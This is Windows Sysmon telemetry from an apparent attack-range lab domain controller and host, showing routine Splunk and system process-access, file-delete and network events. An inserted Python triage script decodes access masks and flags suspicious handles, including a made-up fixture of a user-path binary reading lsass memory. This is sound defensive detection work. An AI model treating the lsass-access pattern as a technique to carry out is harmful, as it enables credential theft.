17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061062Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061061Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:12.357  (remainder of the Event ID 10 record whose header ends the preceding line)  SourceImage C:\Windows\system32\svchost.exe, SourceProcessGuid {761B69BB-818C-607D-0D00-00000000BA01}, SourceProcessId 904, SourceThreadId 924 -> TargetImage C:\Windows\Explorer.EXE, TargetProcessGuid {761B69BB-84D3-607D-0403-00000000BA01}, TargetProcessId 372; GrantedAccess 0x1000; CallTrace = trace A below.

Common header fields for every record that follows: Channel Microsoft-Windows-Sysmon/Operational, Level 4, Opcode 0, Task = Event ID, Keywords 0x8000000000000000, RuleName -, date 2021-04-21 (UTC). Event ID 10 records are schema version 3, Event ID 1 and 23 records version 5.

Records 1061060 down to 1061032: Sysmon Event ID 10 (ProcessAccess) on win-dc-982.attackrange.local, one source, one GrantedAccess value, two call traces that differ only in their rpcss.dll frames.
  SourceImage        C:\Windows\system32\svchost.exe
  SourceProcessGuid  {761B69BB-818C-607D-0D00-00000000BA01}
  SourceProcessId    904
  SourceThreadId     924
  GrantedAccess      0x1000
  Trace A            C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  Trace B            C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  Targets
    Explorer   TargetImage C:\Windows\Explorer.EXE, TargetProcessGuid {761B69BB-84D3-607D-0403-00000000BA01}, TargetProcessId 372
    SearchUI   TargetImage C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, TargetProcessGuid {761B69BB-84E4-607D-2203-00000000BA01}, TargetProcessId 5440
    svchost    TargetImage C:\Windows\system32\svchost.exe, TargetProcessGuid {761B69BB-819C-607D-2900-00000000BA01}, TargetProcessId 2920

  Record   UtcTime       Target    CallTrace
  1061060  17:30:12.357  Explorer  B
  1061059  17:30:12.357  Explorer  A
  1061058  17:30:12.357  Explorer  B
  1061057  17:30:12.357  Explorer  A
  1061056  17:30:12.357  Explorer  B
  1061055  17:30:12.356  Explorer  A
  1061054  17:30:12.356  Explorer  B
  1061053  17:30:12.356  Explorer  A
  1061052  17:30:12.356  Explorer  B
  1061051  17:30:12.356  Explorer  A
  1061050  17:30:12.356  Explorer  B
  1061049  17:30:12.356  Explorer  A
  1061048  17:30:12.356  Explorer  B
  1061047  17:30:12.356  Explorer  A
  1061046  17:30:12.356  Explorer  B
  1061045  17:30:12.356  Explorer  A
  1061044  17:30:12.356  Explorer  B
  1061043  17:30:12.356  Explorer  A
  1061042  17:30:12.356  Explorer  B
  1061041  17:30:12.356  Explorer  A
  1061040  17:30:12.356  Explorer  B
  1061039  17:30:12.356  SearchUI  A
  1061038  17:30:12.356  SearchUI  B
  1061037  17:30:12.356  SearchUI  A
  1061036  17:30:12.355  SearchUI  B
  1061035  17:30:12.355  SearchUI  A
  1061034  17:30:12.355  SearchUI  B
  1061033  17:30:12.355  svchost   A
  1061032  17:30:12.355  svchost   B

Record 1061031, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.173
  SourceImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
  SourceProcessGuid  {761B69BB-6124-6080-955C-00000000BA01}
  SourceProcessId    6612
  SourceThreadId     6320
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  TargetProcessGuid  {761B69BB-8200-607D-A100-00000000BA01}
  TargetProcessId    4148
  GrantedAccess      0x101400
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Records 1061030 and 1061029, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.044
  SourceImage        C:\Windows\system32\svchost.exe
  SourceProcessGuid  {761B69BB-818C-607D-0C00-00000000BA01}
  SourceProcessId    844
  SourceThreadId     972
  GrantedAccess      0x3600
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  1061030 target     C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe, TargetProcessGuid {761B69BB-84E2-607D-1F03-00000000BA01}, TargetProcessId 5220
  1061029 target     C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, TargetProcessGuid {761B69BB-84E4-607D-2203-00000000BA01}, TargetProcessId 5440

Record 1061028, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.036
  SourceImage        C:\Windows\system32\conhost.exe
  SourceProcessGuid  {761B69BB-8200-607D-A500-00000000BA01}
  SourceProcessId    4344
  SourceThreadId     3804
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
  TargetProcessGuid  {761B69BB-6124-6080-955C-00000000BA01}
  TargetProcessId    6612
  GrantedAccess      0x1fffff
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Records 1061027, 1061026, 1061025, 1061024, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.034; identical except for the lsm.dll frame
  SourceImage        C:\Windows\system32\svchost.exe
  SourceProcessGuid  {761B69BB-818C-607D-0C00-00000000BA01}
  SourceProcessId    844
  SourceThreadId     6096
  TargetImage        C:\Windows\sysmon64.exe
  TargetProcessGuid  {761B69BB-819C-607D-2700-00000000BA01}
  TargetProcessId    2816
  GrantedAccess      0x1400
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+<offset>|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  lsm.dll offset     1061027: +fd18   1061026: +11aad   1061025: +11058   1061024: +12023

Record 1061023, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.034
  SourceImage        C:\Windows\system32\csrss.exe
  SourceProcessGuid  {761B69BB-818A-607D-0500-00000000BA01}
  SourceProcessId    408
  SourceThreadId     532
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
  TargetProcessGuid  {761B69BB-6124-6080-955C-00000000BA01}
  TargetProcessId    6612
  GrantedAccess      0x1fffff
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Record 1061022, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:12.033
  SourceImage        C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  SourceProcessGuid  {761B69BB-8200-607D-A100-00000000BA01}
  SourceProcessId    4148
  SourceThreadId     3464
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
  TargetProcessGuid  {761B69BB-6124-6080-955C-00000000BA01}
  TargetProcessId    6612
  GrantedAccess      0x1fffff
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Record 1061021, Event ID 1 (ProcessCreate), win-dc-982.attackrange.local, UtcTime 17:30:12.033
  ProcessGuid        {761B69BB-6124-6080-955C-00000000BA01}
  ProcessId          6612
  Image              C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
  FileVersion        8.0.2
  Description        Active Directory monitor
  Product            splunk Application
  Company            Splunk Inc.
  OriginalFileName   splunk-admon.exe
  CommandLine        "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
  CurrentDirectory   C:\Windows\system32\
  User               NT AUTHORITY\SYSTEM
  LogonGuid          {761B69BB-818A-607D-E703-000000000000}
  LogonId            0x3e7
  TerminalSessionId  0
  IntegrityLevel     System
  Hashes             MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165
  ParentProcessGuid  {761B69BB-8200-607D-A100-00000000BA01}
  ParentProcessId    4148
  ParentImage        C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  ParentCommandLine  "C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

Record 1061020, Event ID 23 (FileDelete), win-dc-982.attackrange.local, UtcTime 17:30:12.004
  ProcessGuid        {761B69BB-820D-607D-D800-00000000BA01}
  ProcessId          1064
  User               NT AUTHORITY\SYSTEM
  Image              C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename     C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes             MD5=C3BF2F5F0C2BE0249D66834349CAEF57,SHA256=99E79ECAED55A29EEEE1FC3A5F4ED9A9D91FEDD2BF21F403D52E5A50A9019D81,IMPHASH=00000000000000000000000000000000
  IsExecutable       false
  Archived           true
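Added example, not code from this page or from Splunk or Sysmon: a triage pass, in Python, over records of the kinds dumped here. Every ProcessAccess record in this excerpt is routine handle traffic of three shapes: query-only access (0x1000, 0x1400, 0x3600, 0x101400) from svchost-hosted services, the PROCESS_ALL_ACCESS (0x1fffff) handle a parent such as splunkd.exe holds on a child it just created, and csrss/conhost bookkeeping identifiable from the basesrv/CSRSRV and ConhostV2 frames in the call trace. The code decodes GrantedAccess into winnt.h rights, suppresses those three shapes, alerts on anything else, and separately reports FileDelete records whose Archived field is not "true" (this page's "false - insufficient disk space" means Sysmon could not keep a copy of the deleted file because its archive directory is full). SAMPLE_EVENTS and PARENT_OF are constructed from values visible on the page; the lsass record and the names updater.exe and the zero GUIDs are a made-up fixture that exists only to exercise the alert path.

```python
# Added example (not code from the page, Splunk or Sysmon): triage of Sysmon
# ProcessAccess (Event ID 10) and FileDelete (Event ID 23) records like those above.
# SAMPLE_EVENTS is constructed from values on the page plus one made-up alert fixture.
from typing import Dict, List, Set, Tuple

# Process access rights from winnt.h; Sysmon's GrantedAccess is this bitmask in hex.
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x002000: "PROCESS_SET_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Rights that let the source read or change the target's memory, handles or threads.
INTRUSIVE = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040 | 0x0080 | 0x0800
# Modules behind the routine Event ID 10 traffic on this page: COM activation (rpcss),
# app lifecycle (psmserviceexthost), session manager (lsm), process-creation
# bookkeeping inside csrss (basesrv/csrsrv) and console hosting (ConhostV2).
EXPECTED_SYSTEM_MODULES = {"rpcss.dll", "psmserviceexthost.dll", "lsm.dll",
                           "basesrv.dll", "csrsrv.dll", "conhostv2.dll"}


def decode_granted_access(hex_mask: str) -> List[str]:
    """Expand a GrantedAccess value such as '0x1400' into named rights."""
    mask = int(hex_mask, 16)
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def trace_modules(call_trace: str) -> Set[str]:
    """Lower-cased module names from a CallTrace such as '...\\ntdll.dll+a6134|...'."""
    return {frame.split("+", 1)[0].rsplit("\\", 1)[-1].lower()
            for frame in call_trace.split("|")}


def triage_process_access(ev: Dict[str, str], parent_of: Dict[str, str]) -> Tuple[str, str]:
    """(verdict, reason); parent_of maps ProcessGuid -> ParentProcessGuid from Event ID 1."""
    mask = int(ev["GrantedAccess"], 16)
    mods = trace_modules(ev["CallTrace"])
    if any(m.startswith("unknown") for m in mods):  # Sysmon writes UNKNOWN(addr) for unbacked code
        return "alert", "call trace has UNKNOWN frames"
    if mask & INTRUSIVE == 0:
        return "suppress", "query/synchronize rights only"
    if parent_of.get(ev["TargetProcessGuid"]) == ev["SourceProcessGuid"]:
        return "suppress", "parent holding the handle CreateProcess returned"
    hits = mods & EXPECTED_SYSTEM_MODULES
    if hits:
        return "suppress", "system path via " + ", ".join(sorted(hits))
    return "alert", "intrusive rights: " + " | ".join(decode_granted_access(ev["GrantedAccess"]))


def archive_failures(events: List[Dict[str, str]]) -> List[str]:
    """Event ID 23 records whose deleted file Sysmon could not preserve (Archived != true)."""
    return [ev["TargetFilename"] for ev in events
            if ev["EventID"] == "23" and not ev.get("Archived", "").startswith("true")]


def triage_all(events: List[Dict[str, str]], parent_of: Dict[str, str]) -> List[Tuple[str, str, str, str]]:
    """(source basename, target basename, verdict, reason) for every Event ID 10 record."""
    return [(ev["SourceImage"].rsplit("\\", 1)[-1], ev["TargetImage"].rsplit("\\", 1)[-1],
             *triage_process_access(ev, parent_of))
            for ev in events if ev["EventID"] == "10"]


NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+a6134"
KB = r"C:\Windows\System32\KERNELBASE.dll+221bd"
SPLUNKD = "{761B69BB-8200-607D-A100-00000000BA01}"
ADMON = "{761B69BB-6124-6080-955C-00000000BA01}"
PARENT_OF = {ADMON: SPLUNKD}  # from the page's Event ID 1 record for splunk-admon.exe
SAMPLE_EVENTS = [  # constructed from values on this page, except the lsass fixture
    {"EventID": "10", "SourceImage": r"C:\Windows\system32\svchost.exe",
     "SourceProcessGuid": "{761B69BB-818C-607D-0D00-00000000BA01}", "GrantedAccess": "0x1000",
     "TargetImage": r"C:\Windows\Explorer.EXE", "TargetProcessGuid": "{761B69BB-84D3-607D-0403-00000000BA01}",
     "CallTrace": NTDLL + "|" + KB + r"|c:\windows\system32\rpcss.dll+ed71"},
    {"EventID": "10", "SourceImage": r"C:\Windows\system32\csrss.exe",
     "SourceProcessGuid": "{761B69BB-818A-607D-0500-00000000BA01}", "GrantedAccess": "0x1fffff",
     "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe", "TargetProcessGuid": ADMON,
     "CallTrace": NTDLL + r"|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645"},
    {"EventID": "10", "SourceImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe",
     "SourceProcessGuid": SPLUNKD, "GrantedAccess": "0x1fffff",
     "TargetImage": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe", "TargetProcessGuid": ADMON,
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860"},
    {"EventID": "10", "SourceImage": r"C:\Windows\system32\svchost.exe",
     "SourceProcessGuid": "{761B69BB-818C-607D-0C00-00000000BA01}", "GrantedAccess": "0x1400",
     "TargetImage": r"C:\Windows\sysmon64.exe", "TargetProcessGuid": "{761B69BB-819C-607D-2700-00000000BA01}",
     "CallTrace": NTDLL + r"|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18"},
    # Made-up fixture, not an observed event: a binary in a user-writable path reading lsass memory.
    {"EventID": "10", "SourceImage": r"C:\Users\Public\updater.exe",
     "SourceProcessGuid": "{00000000-0000-0000-0000-000000000001}", "GrantedAccess": "0x1010",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "TargetProcessGuid": "{00000000-0000-0000-0000-000000000002}",
     "CallTrace": NTDLL + "|" + KB + r"|C:\Users\Public\updater.exe+1a2b"},
    # Event ID 23 from the page: the deleted file was not archived; the Sysmon archive directory is full.
    {"EventID": "23", "Image": r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe",
     "TargetFilename": r"C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security",
     "Archived": "false - insufficient disk space"},
]

if __name__ == "__main__":
    for src, tgt, verdict, reason in triage_all(SAMPLE_EVENTS, PARENT_OF):
        print(f"{verdict:8} {src} -> {tgt}: {reason}")
    for path in archive_failures(SAMPLE_EVENTS):
        print(f"archive failure: {path}")
```

The parent check needs the ProcessGuid to ParentProcessGuid map from Event ID 1, which is why a ProcessAccess rule should be joined with process-creation data rather than evaluated on its own; without it, every splunkd.exe to splunk-admon.exe record with 0x1fffff would look like full-access tampering. The archive check is an operational control, not a detection: a Sysmon host whose FileDelete records carry "false - insufficient disk space" is no longer retaining deleted files, so any forensic reliance on the archive directory for that host is unfounded until the disk is cleared.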
Common header fields for every record that follows: Channel Microsoft-Windows-Sysmon/Operational, Level 4, Opcode 0, Task = Event ID, Keywords 0x8000000000000000, RuleName -, date 2021-04-21 (UTC). Event ID 3 and 23 records are schema version 5, Event ID 11 version 2, Event ID 10 version 3.

Record 1530386, Event ID 3 (NetworkConnect), win-host-5.attackrange.local, UtcTime 17:30:11.763
  ProcessGuid          {21761711-8431-607D-C500-00000000BB01}
  ProcessId            3840
  Image                C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  User                 NT AUTHORITY\SYSTEM
  Protocol             tcp
  Initiated            true
  SourceIsIpv6         false
  SourceIp             10.0.1.15
  SourceHostname       win-host-5.attackrange.local
  SourcePort           64681
  SourcePortName       -
  DestinationIsIpv6    false
  DestinationIp        10.0.1.12
  DestinationHostname  ip-10-0-1-12.us-west-2.compute.internal
  DestinationPort      8000
  DestinationPortName  -

Record 1530385, Event ID 11 (FileCreate), win-host-5.attackrange.local, UtcTime 17:30:13.211
  ProcessGuid      {21761711-8437-607D-CE00-00000000BB01}
  ProcessId        2032
  Image            C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename   C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  CreationUtcTime  2021-04-19 13:20:22.616

Record 1530384, Event ID 23 (FileDelete), win-host-5.attackrange.local, UtcTime 17:30:13.211
  ProcessGuid      {21761711-8437-607D-CE00-00000000BB01}
  ProcessId        2032
  User             NT AUTHORITY\SYSTEM
  Image            C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename   C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes           MD5=AE6003FD1B8C3869F44B4EB544227BB5,SHA256=6772B220AE80A751713AB1B9DE329CF578EB2E26D4F398D66D26D5155DDCED51
  IsExecutable     false
  Archived         false - insufficient disk space

Record 1061094, Event ID 3 (NetworkConnect), win-dc-982.attackrange.local, UtcTime 17:30:08.825
  ProcessGuid          {761B69BB-8207-607D-CF00-00000000BA01}
  ProcessId            4116
  Image                C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  User                 NT AUTHORITY\SYSTEM
  Protocol             tcp
  Initiated            true
  SourceIsIpv6         false
  SourceIp             10.0.1.14
  SourceHostname       win-dc-982.attackrange.local
  SourcePort           1295
  SourcePortName       -
  DestinationIsIpv6    false
  DestinationIp        10.0.1.12
  DestinationHostname  -
  DestinationPort      8000
  DestinationPortName  -

Record 1061093, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:13.211
  SourceImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  SourceProcessGuid  {761B69BB-6125-6080-975C-00000000BA01}
  SourceProcessId    872
  SourceThreadId     4216
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  TargetProcessGuid  {761B69BB-8200-607D-A100-00000000BA01}
  TargetProcessId    4148
  GrantedAccess      0x101400
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Record 1061092, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:13.070
  SourceImage        C:\Windows\system32\conhost.exe
  SourceProcessGuid  {761B69BB-8200-607D-A500-00000000BA01}
  SourceProcessId    4344
  SourceThreadId     3804
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  TargetProcessGuid  {761B69BB-6125-6080-975C-00000000BA01}
  TargetProcessId    872
  GrantedAccess      0x1fffff
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Records 1061091, 1061090, 1061089, 1061088, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:13.069; identical except for the lsm.dll frame
  SourceImage        C:\Windows\system32\svchost.exe
  SourceProcessGuid  {761B69BB-818C-607D-0C00-00000000BA01}
  SourceProcessId    844
  SourceThreadId     6096
  TargetImage        C:\Windows\sysmon64.exe
  TargetProcessGuid  {761B69BB-819C-607D-2700-00000000BA01}
  TargetProcessId    2816
  GrantedAccess      0x1400
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+<offset>|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  lsm.dll offset     1061091: +fd18   1061090: +11aad   1061089: +11058   1061088: +12023

Record 1061087, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:13.069
  SourceImage        C:\Windows\system32\csrss.exe
  SourceProcessGuid  {761B69BB-818A-607D-0500-00000000BA01}
  SourceProcessId    408
  SourceThreadId     532
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  TargetProcessGuid  {761B69BB-6125-6080-975C-00000000BA01}
  TargetProcessId    872
  GrantedAccess      0x1fffff
  CallTrace          C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Record 1061086, Event ID 10 (ProcessAccess), win-dc-982.attackrange.local, UtcTime 17:30:13.069
  SourceImage        C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  SourceProcessGuid  {761B69BB-8200-607D-A100-00000000BA01}
  SourceProcessId    4148
  SourceThreadId     3464
  TargetImage        C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  TargetProcessGuid  {761B69BB-6125-6080-975C-00000000BA01}
  TargetProcessId    872
  GrantedAccess      0x1fffff
